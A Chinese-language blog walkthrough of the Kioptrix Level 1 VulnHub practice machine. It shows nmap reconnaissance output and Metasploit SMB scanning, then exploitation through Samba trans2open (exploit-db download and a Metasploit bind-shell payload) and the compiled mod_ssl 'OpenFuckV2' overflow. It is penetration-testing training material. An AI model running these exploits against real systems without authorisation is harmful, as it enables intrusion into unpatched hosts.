类OSCP靶机-Kioptix Level 1

同步发布：https://www.youi.xin/?p=435

类OSCP靶机-Kioptix Level 1

• 官方下载地址：Kioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
• 百度云下载地址：链接：https://pan.baidu.com/s/1aYc6P2aqPCL4jY1H-G6Z1w
  提取码：youi

vulnhub简介

https://www.vulnhub.com/about/

1.环境部署

安装vmware并直接文件->打开即可

1.可能遇到的问题-网卡无法连接

需要修改 Kioptix Level 1.vmx文件，将ethernet0.networkName的值改为Nat

ethernet0.networkName = "Nat"

重启即可。

2.信息收集

首先使用nmap对网络进行扫描发现主机

发现可疑目标主机192.168.29.131，进行端口扫描，结果如下

root@cheney:~# nmap -sV -A -p 1-65535 192.168.29.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 22:34 CST
Nmap scan report for 192.168.29.131
Host is up (0.0013s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-07-28T14:37:39+00:00; +1m50s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:3D:4C:29 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   1.32 ms 192.168.29.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.04 seconds

在80端口的web中发现一个mrtg http://192.168.29.131/mrtg/index.html 全流量监控 但未搜索到可利用的漏洞

在139端口运行Samba服务，但是nmap并没有扫描出端口。我们需要想办法进行版本探测
Metasploit有一个smb版本扫描模块，但是真实考试Metasploit只能使用一次（之后的操作也会尽量避开Metasploit）。在此只是介绍如何使用。

利用Metasploit扫描smb版本信息

启动msfconsole,搜索smb_version

search smb_version

执行以下命令

use auxiliary/scanner/smb/smb_version
set rhosts [靶机IP] //例如 set rhosts 192.168.29.131
set THREADS 10 //设置线程
run

3.漏洞利用-samba trans2open

非Metasploit版

得到版本信息去搜索漏洞

searchsploit samba linux 2.2

还可以到 https://www.exploit-db.com 搜索攻击脚本
samba存在一个著名的trans2open漏洞，利用该关键字搜索并下载攻击exp,下载链接： https://www.exploit-db.com/download/22469
编译并运行，攻击成功。

Metasploit版

搜索漏洞攻击脚本：

search trans2open

漏洞攻击

use exploit/linux/samba/trans2open
set rhosts 192.168.29.131
set payload linux/x86/shell/bind_tcp

攻击前查看配置

run 发射exp进行攻击，获得权限

4.漏洞利用-apache mod_ssl

搜索exp

选择Apache mod_ssl < 2.8.7 OpenSSL - ‘OpenFuckV2.c’ Remote Buffer Overflow (2) | exploits/unix/remote/47080.c 来进行攻击
编译脚本：

gcc 47080.c -o ssl_mod -lcrypto

选择攻击偏移量

攻击：

./ssl_mod 0x6b 192.168.29.131 443 -c 40

可能遇到的问题

编译时报错：

解决方法：kali下可直接安装libssl-dev

apt-get install libssl-dev